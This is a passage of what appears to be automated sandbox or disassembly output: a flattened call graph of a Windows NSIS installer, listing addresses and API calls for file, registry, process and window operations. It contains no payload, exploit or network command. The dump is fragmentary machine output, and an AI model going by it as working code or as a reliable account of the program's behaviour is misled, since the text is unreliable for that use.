calls 3172->3173 3174 401478 3173->3174 3175 401484 3174->3175 3176 405ce3 5 API calls 3174->3176 3177 405eff lstrlenA wvsprintfA 3175->3177 3176->3175 3249 405d7d 3177->3249 3186 405cef 3180->3186 3181 405d58 3182 405d5c CharPrevA 3181->3182 3184 405d77 3181->3184 3182->3181 3183 405d4d CharNextA 3183->3181 3183->3186 3184->3143 3186->3181 3186->3183 3187 405d3b CharNextA 3186->3187 3188 405d48 CharNextA 3186->3188 3260 405a5f 3186->3260 3187->3186 3188->3183 3189->3143 3192 404d29 3190->3192 3197 401b85 3190->3197 3191 404d48 lstrlenA 3193 404d71 3191->3193 3194 404d56 lstrlenA 3191->3194 3192->3191 3195 4060ec 18 API calls 3192->3195 3198 404d84 3193->3198 3199 404d77 SetWindowTextA 3193->3199 3196 404d68 lstrcatA 3194->3196 3194->3197 3195->3191 3196->3193 3201 403347 3197->3201 3198->3197 3200 404d8a SendMessageA SendMessageA SendMessageA 3198->3200 3199->3198 3200->3197 3202 403373 3201->3202 3203 403357 SetFilePointer 3201->3203 3264 4031c9 GetTickCount 3202->3264 3203->3202 3206 403384 ReadFile 3207 401b98 3206->3207 3208 4033a5 3206->3208 3207->3147 3208->3207 3209 4031c9 43 API calls 3208->3209 3210 4033bc 3209->3210 3210->3207 3212 403437 ReadFile 3210->3212 3213 4033cc 3210->3213 3212->3207 3213->3207 3214 4033e7 ReadFile 3213->3214 3215 403400 WriteFile 3213->3215 3214->3207 3214->3213 3215->3207 3215->3213 3216->3129 3217->3128 3219 401a47 lstrcatA 3218->3219 3220 405fdb lstrcatA 3218->3220 3219->3129 3220->3219 3222 405f50 3221->3222 3223 405f45 FindClose 3221->3223 3222->3143 3223->3222 3225 405b20 SetFileAttributesA 3224->3225 3226 405b2e 3224->3226 3225->3226 3226->3143 3243 4060f9 3227->3243 3228 406329 3229 40633e 3228->3229 3316 405cc1 lstrcpynA 3228->3316 3229->3143 3231 4061a0 GetVersion 3231->3243 3232 4062fc lstrlenA 3232->3243 3235 4060ec 10 API calls 3235->3232 3236 406218 GetSystemDirectoryA 3236->3243 3238 40622b GetWindowsDirectoryA 3238->3243 3239 405ce3 5 API calls 3239->3243 3240 4062a2 lstrcatA 3240->3243 3241 40625f 
SHGetSpecialFolderLocation 3241->3243 3244 406277 SHGetPathFromIDListA CoTaskMemFree 3241->3244 3242 4060ec 10 API calls 3242->3243 3243->3228 3243->3231 3243->3232 3243->3235 3243->3236 3243->3238 3243->3239 3243->3240 3243->3241 3243->3242 3309 405ba8 RegOpenKeyExA 3243->3309 3314 405c1f wsprintfA 3243->3314 3315 405cc1 lstrcpynA 3243->3315 3244->3243 3246 405a10 3245->3246 3247 405a5c 3246->3247 3248 405a24 MessageBoxIndirectA 3246->3248 3247->3143 3248->3247 3250 405da2 3249->3250 3251 405d88 3249->3251 3253 405d99 3250->3253 3254 405de1 3250->3254 3255 405dea lstrcatA lstrlenA WriteFile 3250->3255 3259 405b31 GetFileAttributesA CreateFileA 3250->3259 3252 405d92 CloseHandle 3251->3252 3251->3253 3252->3253 3253->3123 3254->3253 3254->3255 3255->3253 3257 405dcc 3257->3253 3258 405dd6 SetFilePointer 3257->3258 3258->3254 3259->3257 3261 405a65 3260->3261 3262 405a78 3261->3262 3263 405a6b CharNextA 3261->3263 3262->3186 3263->3261 3265 403327 3264->3265 3266 4031f8 3264->3266 3267 4030e1 33 API calls 3265->3267 3277 4031b2 SetFilePointer 3266->3277 3274 40332e 3267->3274 3269 403203 SetFilePointer 3273 403228 3269->3273 3273->3274 3275 4032c1 WriteFile 3273->3275 3276 403318 SetFilePointer 3273->3276 3278 403180 ReadFile 3273->3278 3280 40678d 3273->3280 3287 4030e1 3273->3287 3274->3206 3274->3207 3275->3273 3275->3274 3276->3265 3277->3269 3279 4031a1 3278->3279 3279->3273 3281 4067ad 3280->3281 3284 4067b5 3280->3284 3281->3273 3282 406846 GlobalAlloc 3282->3281 3282->3284 3283 40683d GlobalFree 3283->3282 3284->3281 3284->3282 3284->3283 3285 4068b2 GlobalFree 3284->3285 3286 4068bb GlobalAlloc 3284->3286 3285->3286 3286->3281 3286->3284 3288 403107 3287->3288 3289 4030ef 3287->3289 3291 403117 GetTickCount 3288->3291 3292 40310f 3288->3292 3290 4030f8 DestroyWindow 3289->3290 3297 4030ff 3289->3297 3290->3297 3293 403125 3291->3293 3291->3297 3302 405f8d 3292->3302 3295 40315a CreateDialogParamA ShowWindow 3293->3295 3296 40312d 3293->3296 3295->3297 
3296->3297 3306 403049 3296->3306 3297->3273 3299 40313b wsprintfA 3300 404d10 25 API calls 3299->3300 3301 403158 3300->3301 3301->3297 3303 405faa PeekMessageA 3302->3303 3304 405fa0 DispatchMessageA 3303->3304 3305 405fba 3303->3305 3304->3303 3305->3297 3307 403058 3306->3307 3308 40305a MulDiv 3306->3308 3307->3308 3308->3299 3310 405c19 3309->3310 3311 405bdb RegQueryValueExA 3309->3311 3310->3243 3312 405bfc RegCloseKey 3311->3312 3312->3310 3314->3243 3315->3243 3316->3229 4125 401e70 4126 401450 18 API calls 4125->4126 4127 401e78 4126->4127 4128 40143a 18 API calls 4127->4128 4129 401e82 wsprintfA 4128->4129 4130 402e70 4131 40143a 18 API calls 4130->4131 4132 402e77 4131->4132 4133 4060ec 18 API calls 4132->4133 4134 4019e4 4132->4134 4133->4134 4135 404671 4136 404696 4135->4136 4137 40467f 4135->4137 4138 4046a4 IsWindowVisible 4136->4138 4146 4046bb 4136->4146 4139 4046ff 4137->4139 4140 404685 4137->4140 4138->4139 4141 4046b1 4138->4141 4142 404705 CallWindowProcA 4139->4142 4143 403c55 SendMessageA 4140->4143 4154 4045f1 SendMessageA 4141->4154 4145 40468f 4142->4145 4143->4145 4146->4142 4159 405cc1 lstrcpynA 4146->4159 4148 4046ea 4160 405c1f wsprintfA 4148->4160 4150 4046f1 4151 401411 74 API calls 4150->4151 4152 4046f8 4151->4152 4161 405cc1 lstrcpynA 4152->4161 4155 404650 SendMessageA 4154->4155 4156 404614 GetMessagePos ScreenToClient SendMessageA 4154->4156 4158 404648 4155->4158 4157 40464d 4156->4157 4156->4158 4157->4155 4158->4146 4159->4148 4160->4150 4161->4139 4162 40207a GetDlgItem GetClientRect 4163 401450 18 API calls 4162->4163 4164 4020ab LoadImageA SendMessageA 4163->4164 4165 4020c9 DeleteObject 4164->4165 4166 402ef6 4164->4166 4165->4166 4167 402a7a 4168 402a81 4167->4168 4169 402ef6 4167->4169 4170 402a88 CloseHandle 4168->4170 4170->4169 4171 402bfb 4172 402c02 4171->4172 4173 402ef6 4171->4173 4174 402c08 FindClose 4172->4174 4174->4173 4175 403b7c 4176 403b87 4175->4176 4177 403b8b 4176->4177 4178 403b8e GlobalAlloc 
4176->4178 4178->4177 4179 402c7f 4180 401450 18 API calls 4179->4180 4182 402c8e 4180->4182 4181 402ca5 4184 405b11 2 API calls 4181->4184 4182->4181 4183 401450 18 API calls 4182->4183 4183->4181 4185 402cab 4184->4185 4207 405b31 GetFileAttributesA CreateFileA 4185->4207 4187 402cb8 4188 402d61 4187->4188 4189 402cc4 GlobalAlloc 4187->4189 4192 405eff 9 API calls 4188->4192 4190 402d58 CloseHandle 4189->4190 4191 402cdd 4189->4191 4190->4188 4208 4031b2 SetFilePointer 4191->4208 4194 402d71 4192->4194 4196 402d7c DeleteFileA 4194->4196 4197 402d8f 4194->4197 4195 402ce3 4198 403180 ReadFile 4195->4198 4196->4197 4199 402cec GlobalAlloc 4198->4199 4200 402d30 WriteFile GlobalFree 4199->4200 4201 402cfc 4199->4201 4203 403347 48 API calls 4200->4203 4202 403347 48 API calls 4201->4202 4205 402d09 4202->4205 4204 402d55 4203->4204 4204->4190 4206 402d27 GlobalFree 4205->4206 4206->4200 4207->4187 4208->4195 3317 402380 3318 402392 3317->3318 3332 402467 3317->3332 3320 401450 18 API calls 3318->3320 3319 401429 25 API calls 3324 402479 3319->3324 3321 40239a 3320->3321 3322 401450 18 API calls 3321->3322 3323 4023a4 3322->3323 3325 4023ba LoadLibraryExA 3323->3325 3326 4023ac GetModuleHandleA 3323->3326 3327 4023cf GetProcAddress 3325->3327 3328 402460 3325->3328 3326->3325 3326->3327 3330 4023e1 3327->3330 3331 40241e 3327->3331 3329 401429 25 API calls 3328->3329 3329->3332 3337 4023f1 3330->3337 3339 401429 3330->3339 3333 404d10 25 API calls 3331->3333 3332->3319 3334 402428 3333->3334 3336 405eff 9 API calls 3334->3336 3336->3337 3337->3324 3338 402452 FreeLibrary 3337->3338 3338->3324 3340 404d10 25 API calls 3339->3340 3341 401437 3340->3341 3341->3337 4209 401000 4210 401037 BeginPaint GetClientRect 4209->4210 4211 40100c DefWindowProcA 4209->4211 4213 4010f3 4210->4213 4214 401179 4211->4214 4215 401073 CreateBrushIndirect FillRect DeleteObject 4213->4215 4216 4010fc 4213->4216 4215->4213 4217 401102 CreateFontIndirectA 4216->4217 4218 401167 EndPaint 
4216->4218 4217->4218 4219 401112 6 API calls 4217->4219 4218->4214 4219->4218 4220 402780 4221 402786 4220->4221 4222 4027d4 4221->4222 4223 40278f 4221->4223 4225 401450 18 API calls 4222->4225 4236 40153e 4223->4236 4227 4027dc 4225->4227 4226 402796 4230 401450 18 API calls 4226->4230 4233 4019e4 4226->4233 4228 405eff 9 API calls 4227->4228 4229 4027ec 4228->4229 4240 401488 RegOpenKeyExA 4229->4240 4231 4027a8 RegDeleteValueA 4230->4231 4234 405eff 9 API calls 4231->4234 4235 4027c8 RegCloseKey 4234->4235 4235->4233 4237 40154f 4236->4237 4238 401450 18 API calls 4237->4238 4239 401576 RegOpenKeyExA 4238->4239 4239->4226 4247 4014b4 4240->4247 4248 401500 4240->4248 4241 4014da RegEnumKeyA 4242 4014ec RegCloseKey 4241->4242 4241->4247 4244 405f56 3 API calls 4242->4244 4243 401511 RegCloseKey 4243->4248 4246 4014fc 4244->4246 4245 401488 3 API calls 4245->4247 4246->4248 4249 40152c RegDeleteKeyA 4246->4249 4247->4241 4247->4242 4247->4243 4247->4245 4248->4233 4249->4248 4250 402b01 4251 40143a 18 API calls 4250->4251 4254 402b0b 4251->4254 4252 402b81 4253 402b3f ReadFile 4253->4252 4253->4254 4254->4252 4254->4253 4255 402b83 4254->4255 4256 402b93 4254->4256 4259 405c1f wsprintfA 4255->4259 4256->4252 4258 402ba9 SetFilePointer 4256->4258 4258->4252 4259->4252 3342 403783 #17 SetErrorMode OleInitialize 3414 405f56 GetModuleHandleA 3342->3414 3346 4037f1 GetCommandLineA 3419 405cc1 lstrcpynA 3346->3419 3348 403803 GetModuleHandleA 3349 40381a 3348->3349 3350 405a5f CharNextA 3349->3350 3351 40382e CharNextA 3350->3351 3364 40383b 3351->3364 3352 4038a4 3353 4038b7 GetTempPathA 3352->3353 3420 40370d 3353->3420 3355 4038cd 3357 4038d1 GetWindowsDirectoryA lstrcatA 3355->3357 3358 4038f5 DeleteFileA 3355->3358 3356 405a5f CharNextA 3356->3364 3359 40370d 11 API calls 3357->3359 3428 403472 GetTickCount GetModuleFileNameA 3358->3428 3363 4038ed 3359->3363 3361 4038a6 3525 405cc1 lstrcpynA 3361->3525 3362 403906 3365 40397a 3362->3365 3367 40395f 3362->3367 
3370 405a5f CharNextA 3362->3370 3363->3358 3363->3365 3364->3352 3364->3356 3364->3361 3516 403741 3365->3516 3458 4056b1 3367->3458 3373 40391d 3370->3373 3382 4039a5 lstrcatA lstrcmpiA 3373->3382 3383 40393a 3373->3383 3374 403a74 3376 403af7 3374->3376 3379 405f56 3 API calls 3374->3379 3375 40398f 3378 4059fb MessageBoxIndirectA 3375->3378 3377 405d7d 7 API calls 3377->3365 3380 40399d ExitProcess 3378->3380 3381 403a83 3379->3381 3384 405f56 3 API calls 3381->3384 3382->3365 3386 4039c1 CreateDirectoryA SetCurrentDirectoryA 3382->3386 3526 406014 3383->3526 3387 403a8c 3384->3387 3389 4039e3 3386->3389 3390 4039d8 3386->3390 3392 405f56 3 API calls 3387->3392 3543 405cc1 lstrcpynA 3389->3543 3542 405cc1 lstrcpynA 3390->3542 3394 403a95 3392->3394 3396 403ae3 ExitWindowsEx 3394->3396 3403 403aa3 GetCurrentProcess 3394->3403 3396->3376 3399 403af0 3396->3399 3397 403954 3541 405cc1 lstrcpynA 3397->3541 3398 4060ec 18 API calls 3401 403a13 DeleteFileA 3398->3401 3573 401411 3399->3573 3404 403a20 CopyFileA 3401->3404 3405 4039f1 3401->3405 3406 403ab3 3403->3406 3404->3405 3405->3398 3407 403a68 3405->3407 3411 4060ec 18 API calls 3405->3411 3413 403a54 CloseHandle 3405->3413 3544 406342 3405->3544 3570 40599a CreateProcessA 3405->3570 3406->3396 3408 406342 38 API calls 3407->3408 3410 403a6f 3408->3410 3410->3365 3411->3405 3413->3405 3415 405f70 LoadLibraryA 3414->3415 3416 405f7b GetProcAddress 3414->3416 3415->3416 3417 4037c6 SHGetFileInfoA 3415->3417 3416->3417 3418 405cc1 lstrcpynA 3417->3418 3418->3346 3419->3348 3421 405ce3 5 API calls 3420->3421 3422 403719 3421->3422 3423 403723 3422->3423 3424 405fc0 3 API calls 3422->3424 3423->3355 3425 40372b CreateDirectoryA 3424->3425 3576 405b60 3425->3576 3580 405b31 GetFileAttributesA CreateFileA 3428->3580 3430 4034b5 3457 4034c2 3430->3457 3581 405cc1 lstrcpynA 3430->3581 3432 4034d8 3582 405fed lstrlenA 3432->3582 3436 4034e9 GetFileSize 3437 4035e5 3436->3437 3448 403500 3436->3448 3438 4030e1 33 API 
calls 3437->3438 3439 4035ee 3438->3439 3441 403622 GlobalAlloc 3439->3441 3439->3457 3587 4031b2 SetFilePointer 3439->3587 3440 403180 ReadFile 3440->3448 3444 403639 3441->3444 3443 40367a 3446 4030e1 33 API calls 3443->3446 3449 405b60 2 API calls 3444->3449 3445 40360b 3447 403180 ReadFile 3445->3447 3446->3457 3450 403616 3447->3450 3448->3437 3448->3440 3448->3443 3451 4030e1 33 API calls 3448->3451 3448->3457 3452 40364a CreateFileA 3449->3452 3450->3441 3450->3457 3451->3448 3453 403689 3452->3453 3452->3457 3588 4031b2 SetFilePointer 3453->3588 3455 403697 3456 403347 48 API calls 3455->3456 3456->3457 3457->3362 3459 405f56 3 API calls 3458->3459 3460 4056c5 3459->3460 3461 4056cb 3460->3461 3462 4056dd 3460->3462 3598 405c1f wsprintfA 3461->3598 3463 405ba8 3 API calls 3462->3463 3464 4056fe 3463->3464 3465 40571c lstrcatA 3464->3465 3468 405ba8 3 API calls 3464->3468 3467 4056db 3465->3467 3589 403d3b 3467->3589 3468->3465 3471 406014 18 API calls 3472 40574e 3471->3472 3473 4057d7 3472->3473 3476 405ba8 3 API calls 3472->3476 3474 406014 18 API calls 3473->3474 3475 4057dd 3474->3475 3477 4057ed 3475->3477 3479 4060ec 18 API calls 3475->3479 3478 40577a 3476->3478 3480 40580d LoadImageA 3477->3480 3600 403d1a 3477->3600 3478->3473 3481 405796 lstrlenA 3478->3481 3484 405a5f CharNextA 3478->3484 3479->3477 3482 4058c1 3480->3482 3483 405838 RegisterClassA 3480->3483 3485 4057a4 lstrcmpiA 3481->3485 3486 4057ca 3481->3486 3489 401411 74 API calls 3482->3489 3488 405874 SystemParametersInfoA CreateWindowExA 3483->3488 3515 40396f 3483->3515 3490 405794 3484->3490 3485->3486 3491 4057b4 GetFileAttributesA 3485->3491 3493 405fc0 3 API calls 3486->3493 3488->3482 3494 4058c7 3489->3494 3490->3481 3495 4057c0 3491->3495 3492 405803 3492->3480 3496 4057d0 3493->3496 3497 403d3b 19 API calls 3494->3497 3494->3515 3495->3486 3498 405fed 2 API calls 3495->3498 3599 405cc1 lstrcpynA 3496->3599 3500 4058d8 3497->3500 3498->3486 3501 4058e4 ShowWindow LoadLibraryA 
3500->3501 3502 405967 3500->3502 3503 405903 LoadLibraryA 3501->3503 3504 40590a GetClassInfoA 3501->3504 3605 404de2 OleInitialize 3502->3605 3503->3504 3506 405934 DialogBoxParamA 3504->3506 3507 40591e GetClassInfoA RegisterClassA 3504->3507 3509 401411 74 API calls 3506->3509 3507->3506 3508 40596d 3510 405971 3508->3510 3511 405989 3508->3511 3513 40595c 3509->3513 3514 401411 74 API calls 3510->3514 3510->3515 3512 401411 74 API calls 3511->3512 3512->3515 3513->3515 3514->3515 3515->3377 3517 403752 CloseHandle 3516->3517 3518 40375c 3516->3518 3517->3518 3519 403770 3518->3519 3520 403766 CloseHandle 3518->3520 3745 403b29 3519->3745 3520->3519 3525->3353 3800 405cc1 lstrcpynA 3526->3800 3528 406025 3529 405aa0 4 API calls 3528->3529 3530 40602b 3529->3530 3531 405ce3 5 API calls 3530->3531 3538 403945 3530->3538 3537 40603b 3531->3537 3532 40606e lstrlenA 3533 406075 3532->3533 3532->3537 3534 405fc0 3 API calls 3533->3534 3536 40607b GetFileAttributesA 3534->3536 3535 405f2f 2 API calls 3535->3537 3536->3538 3537->3532 3537->3535 3537->3538 3539 405fed 2 API calls 3537->3539 3538->3365 3540 405cc1 lstrcpynA 3538->3540 3539->3532 3540->3397 3541->3367 3542->3389 3543->3405 3545 405f56 3 API calls 3544->3545 3546 40634d 3545->3546 3547 4063aa GetShortPathNameA 3546->3547 3549 40649f 3546->3549 3801 405b31 GetFileAttributesA CreateFileA 3546->3801 3547->3549 3550 4063bf 3547->3550 3549->3405 3550->3549 3552 4063c7 wsprintfA 3550->3552 3551 40638e CloseHandle GetShortPathNameA 3551->3549 3553 4063a2 3551->3553 3554 4060ec 18 API calls 3552->3554 3553->3547 3553->3549 3555 4063ef 3554->3555 3802 405b31 GetFileAttributesA CreateFileA 3555->3802 3557 4063fc 3557->3549 3558 40640b GetFileSize GlobalAlloc 3557->3558 3559 406498 CloseHandle 3558->3559 3560 406429 ReadFile 3558->3560 3559->3549 3560->3559 3561 40643d 3560->3561 3561->3559 3803 406096 lstrlenA 3561->3803 3564 406452 3808 405cc1 lstrcpynA 3564->3808 3565 4064ac 3566 406096 4 API calls 3565->3566 3568 
406460 3566->3568 3569 406473 SetFilePointer WriteFile GlobalFree 3568->3569 3569->3559 3571 4059d5 3570->3571 3572 4059c9 CloseHandle 3570->3572 3571->3405 3572->3571 3574 40138f 74 API calls 3573->3574 3575 401426 3574->3575 3575->3376 3577 405b6b GetTickCount GetTempFileNameA 3576->3577 3578 40373f 3577->3578 3579 405b97 3577->3579 3578->3355 3579->3577 3579->3578 3580->3430 3581->3432 3583 405ffb 3582->3583 3584 406000 CharPrevA 3583->3584 3585 4034de 3583->3585 3584->3583 3584->3585 3586 405cc1 lstrcpynA 3585->3586 3586->3436 3587->3445 3588->3455 3590 403d4f 3589->3590 3613 405c1f wsprintfA 3590->3613 3592 403dc0 3593 4060ec 18 API calls 3592->3593 3594 403dcc SetWindowTextA 3593->3594 3595 403de7 3594->3595 3596 403e02 3595->3596 3597 4060ec 18 API calls 3595->3597 3596->3471 3597->3595 3598->3467 3599->3473 3614 405cc1 lstrcpynA 3600->3614 3602 403d2e 3603 405fc0 3 API calls 3602->3603 3604 403d34 lstrcatA 3603->3604 3604->3492 3615 403c55 3605->3615 3607 404e05 3610 405eff 9 API calls 3607->3610 3612 404e30 3607->3612 3618 40138f 3607->3618 3608 403c55 SendMessageA 3609 404e40 OleUninitialize 3608->3609 3609->3508 3610->3607 3612->3608 3613->3592 3614->3602 3616 403c6d 3615->3616 3617 403c5e SendMessageA 3615->3617 3616->3607 3617->3616 3621 401396 3618->3621 3619 401404 3619->3607 3621->3619 3622 4013d1 MulDiv SendMessageA 3621->3622 3623 40158d 3621->3623 3622->3621 3624 4015e4 3623->3624 3651 4015f6 3623->3651 3625 401600 3624->3625 3626 401721 3624->3626 3627 4017a3 3624->3627 3628 401627 3624->3628 3629 4016a9 3624->3629 3630 4015eb 3624->3630 3631 40186f 3624->3631 3632 401733 3624->3632 3633 4018b4 3624->3633 3634 401934 3624->3634 3635 40163b 3624->3635 3636 40199c 3624->3636 3637 40165d 3624->3637 3638 40167f 3624->3638 3639 40175f 3624->3639 3649 4016c2 3624->3649 3624->3651 3648 401450 18 API calls 3625->3648 3743 405c1f wsprintfA 3626->3743 3642 401450 18 API calls 3627->3642 3628->3651 3653 401632 PostQuitMessage 3628->3653 3647 405eff 9 API 
calls 3629->3647 3646 405eff 9 API calls 3630->3646 3643 401450 18 API calls 3631->3643 3655 401742 ShowWindow 3632->3655 3656 401749 3632->3656 3650 401450 18 API calls 3633->3650 3645 401450 18 API calls 3634->3645 3678 405eff 9 API calls 3635->3678 3654 401450 18 API calls 3636->3654 3641 401450 18 API calls 3637->3641 3740 40143a 3638->3740 3640 401450 18 API calls 3639->3640 3657 401767 3640->3657 3658 401664 3641->3658 3659 4017ab 3642->3659 3660 401876 3643->3660 3662 40193b GetFullPathNameA 3645->3662 3646->3651 3663 4016b3 SetForegroundWindow 3647->3663 3664 401607 3648->3664 3649->3651 3665 40143a 18 API calls 3649->3665 3666 4018bc 3650->3666 3651->3621 3653->3651 3667 4019a4 SearchPathA 3654->3667 3655->3656 3656->3651 3668 401756 ShowWindow 3656->3668 3669 405eff 9 API calls 3657->3669 3670 405eff 9 API calls 3658->3670 3671 405eff 9 API calls 3659->3671 3672 405f2f 2 API calls 3660->3672 3661 401686 3673 405eff 9 API calls 3661->3673 3674 401955 3662->3674 3675 401976 3662->3675 3663->3651 3676 405eff 9 API calls 3664->3676 3665->3651 3677 401450 18 API calls 3666->3677 3667->3651 3668->3651 3679 401777 SetFileAttributesA 3669->3679 3680 40166f 3670->3680 3681 4017bb 3671->3681 3682 40187e 3672->3682 3683 401693 3673->3683 3674->3675 3701 405f2f 2 API calls 3674->3701 3675->3651 3696 40198a GetShortPathNameA 3675->3696 3684 401612 3676->3684 3685 4018c6 3677->3685 3686 40164f 3678->3686 3679->3651 3688 40178c 3679->3688 3689 404d10 25 API calls 3680->3689 3733 405aa0 CharNextA CharNextA 3681->3733 3691 401882 3682->3691 3692 40189b 3682->3692 3693 40169a 3683->3693 3694 40169d Sleep 3683->3694 3695 404d10 25 API calls 3684->3695 3697 401450 18 API calls 3685->3697 3687 40138f 59 API calls 3686->3687 3687->3651 3698 405eff 9 API calls 3688->3698 3689->3651 3699 405eff 9 API calls 3691->3699 3700 405eff 9 API calls 3692->3700 3693->3694 3694->3651 3695->3651 3696->3651 3702 4018d1 3697->3702 3698->3651 3699->3651 3700->3651 3704 401966 3701->3704 3705 
405eff 9 API calls 3702->3705 3703 401840 3708 401863 3703->3708 3709 401845 3703->3709 3704->3675 3744 405cc1 lstrcpynA 3704->3744 3707 4018de MoveFileA 3705->3707 3706 405a5f CharNextA 3711 4017d2 CreateDirectoryA 3706->3711 3713 4018f5 3707->3713 3714 4018ee 3707->3714 3716 401429 25 API calls 3708->3716 3710 401429 25 API calls 3709->3710 3715 40184c 3710->3715 3717 4017e7 GetLastError 3711->3717 3718 4017c4 3711->3718 3719 405f2f 2 API calls 3713->3719 3732 401914 3713->3732 3714->3708 3739 405cc1 lstrcpynA 3715->3739 3716->3651 3721 4017f4 GetLastError 3717->3721 3722 40180e GetFileAttributesA 3717->3722 3718->3703 3718->3706 3728 405eff 9 API calls 3718->3728 3723 401900 3719->3723 3726 405eff 9 API calls 3721->3726 3722->3718 3729 406342 38 API calls 3723->3729 3723->3732 3724 401857 SetCurrentDirectoryA 3724->3651 3725 405eff 9 API calls 3727 40192e 3725->3727 3726->3718 3727->3651 3728->3718 3730 40190d 3729->3730 3731 401429 25 API calls 3730->3731 3731->3732 3732->3725 3734 405aba 3733->3734 3738 405ac6 3733->3738 3735 405ac1 CharNextA 3734->3735 3734->3738 3736 405ae3 3735->3736 3736->3718 3737 405a5f CharNextA 3737->3738 3738->3736 3738->3737 3739->3724 3741 4060ec 18 API calls 3740->3741 3742 401449 3741->3742 3742->3661 3743->3651 3744->3675 3746 403b37 3745->3746 3747 403775 3746->3747 3748 403b3c FreeLibrary GlobalFree 3746->3748 3749 4064db 3747->3749 3748->3747 3748->3748 3750 406014 18 API calls 3749->3750 3751 4064ee 3750->3751 3752 4064f7 DeleteFileA 3751->3752 3753 40650e 3751->3753 3754 403781 OleUninitialize 3752->3754 3755 40666e 3753->3755 3798 405cc1 lstrcpynA 3753->3798 3754->3374 3754->3375 3755->3754 3758 406685 3755->3758 3761 405f2f 2 API calls 3755->3761 3757 406539 3759 406543 lstrcatA 3757->3759 3760 40654d 3757->3760 3764 405eff 9 API calls 3758->3764 3762 406553 3759->3762 3763 405fed 2 API calls 3760->3763 3766 406691 3761->3766 3765 406561 lstrcatA 3762->3765 3767 406569 lstrlenA FindFirstFileA 3762->3767 3763->3762 
3764->3754 3765->3767 3766->3754 3768 405fc0 3 API calls 3766->3768 3767->3755 3792 40658e 3767->3792 3769 40669b 3768->3769 3771 405eff 9 API calls 3769->3771 3770 405a5f CharNextA 3770->3792 3772 4066a6 3771->3772 3773 405b11 2 API calls 3772->3773 3774 4066ae RemoveDirectoryA 3773->3774 3777 4066f1 3774->3777 3778 4066ba 3774->3778 3775 40664d FindNextFileA 3779 406665 FindClose 3775->3779 3775->3792 3780 404d10 25 API calls 3777->3780 3778->3758 3781 4066c0 3778->3781 3779->3755 3780->3754 3783 405eff 9 API calls 3781->3783 3782 405eff 9 API calls 3782->3792 3785 4066ca 3783->3785 3784 4064db 66 API calls 3784->3792 3787 404d10 25 API calls 3785->3787 3786 405b11 2 API calls 3788 406602 DeleteFileA 3786->3788 3789 4066d4 3787->3789 3788->3792 3790 406342 38 API calls 3789->3790 3793 4066db 3790->3793 3791 404d10 25 API calls 3791->3775 3792->3770 3792->3775 3792->3782 3792->3784 3792->3786 3792->3791 3796 406614 3792->3796 3799 405cc1 lstrcpynA 3792->3799 3793->3754 3794 405eff 9 API calls 3794->3796 3795 404d10 25 API calls 3795->3796 3796->3775 3796->3794 3796->3795 3797 406342 38 API calls 3796->3797 3797->3796 3798->3757 3799->3792 3800->3528 3801->3551 3802->3557 3804 4060d7 lstrlenA 3803->3804 3805 4060b0 lstrcmpiA 3804->3805 3806 4060df 3804->3806 3805->3806 3807 4060ce CharNextA 3805->3807 3806->3564 3806->3565 3807->3804 3808->3568 4260 405203 4261 405357 4260->4261 4262 40521b 4260->4262 4264 405368 GetDlgItem GetDlgItem 4261->4264 4279 4053a8 4261->4279 4262->4261 4263 405227 4262->4263 4265 405232 SetWindowPos 4263->4265 4266 405245 4263->4266 4267 403be5 19 API calls 4264->4267 4265->4266 4269 405262 4266->4269 4270 40524a ShowWindow 4266->4270 4271 405392 SetClassLongA 4267->4271 4268 403c55 SendMessageA 4300 405414 4268->4300 4274 405284 4269->4274 4275 40526a DestroyWindow 4269->4275 4270->4269 4276 401411 74 API calls 4271->4276 4272 405402 4272->4268 4273 405352 4272->4273 4280 405289 SetWindowLongA 4274->4280 4281 40529a 4274->4281 4278 
405661 4275->4278 4276->4279 4277 40138f 74 API calls 4282 4053da 4277->4282 4278->4273 4289 405692 ShowWindow 4278->4289 4279->4272 4279->4277 4280->4273 4285 405311 4281->4285 4286 4052a6 GetDlgItem 4281->4286 4282->4272 4287 4053de SendMessageA 4282->4287 4283 401411 74 API calls 4283->4300 4284 405663 DestroyWindow EndDialog 4284->4278 4288 403c70 8 API calls 4285->4288 4290 4052d6 4286->4290 4291 4052b9 SendMessageA IsWindowEnabled 4286->4291 4287->4273 4288->4273 4289->4273 4293 4052e3 4290->4293 4294 40532a SendMessageA 4290->4294 4295 4052f6 4290->4295 4303 4052db 4290->4303 4291->4273 4291->4290 4292 4060ec 18 API calls 4292->4300 4293->4294 4293->4303 4294->4285 4298 405313 4295->4298 4299 4052fe 4295->4299 4296 403bbe SendMessageA 4296->4285 4297 403be5 19 API calls 4297->4300 4302 401411 74 API calls 4298->4302 4301 401411 74 API calls 4299->4301 4300->4273 4300->4283 4300->4284 4300->4292 4300->4297 4304 403be5 19 API calls 4300->4304 4319 4055a3 DestroyWindow 4300->4319 4301->4303 4302->4303 4303->4285 4303->4296 4305 40548f GetDlgItem 4304->4305 4306 4054a4 4305->4306 4307 4054ad ShowWindow EnableWindow 4305->4307 4306->4307 4328 403c2b EnableWindow 4307->4328 4309 4054d7 EnableWindow 4312 4054eb 4309->4312 4310 4054f0 GetSystemMenu EnableMenuItem SendMessageA 4311 405520 SendMessageA 4310->4311 4310->4312 4311->4312 4312->4310 4329 403c3e SendMessageA 4312->4329 4330 405cc1 lstrcpynA 4312->4330 4315 40554e lstrlenA 4316 4060ec 18 API calls 4315->4316 4317 40555f SetWindowTextA 4316->4317 4318 40138f 74 API calls 4317->4318 4318->4300 4319->4278 4320 4055bd CreateDialogParamA 4319->4320 4320->4278 4321 4055f0 4320->4321 4322 403be5 19 API calls 4321->4322 4323 4055fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4322->4323 4324 40138f 74 API calls 4323->4324 4325 405641 4324->4325 4325->4273 4326 405649 ShowWindow 4325->4326 4327 403c55 SendMessageA 4326->4327 4327->4278 4328->4309 4329->4312 4330->4315 4331 402483 4332 401450 18 API calls 

    Control-flow Graph

    APIs
    • #17.COMCTL32 ref: 004037A2
    • SetErrorMode.KERNELBASE(00008001), ref: 004037AD
    • OleInitialize.OLE32(00000000), ref: 004037B4
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • SHGetFileInfoA.SHELL32(00408A93,00000000,?,00000160,00000000,00000008), ref: 004037DC
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
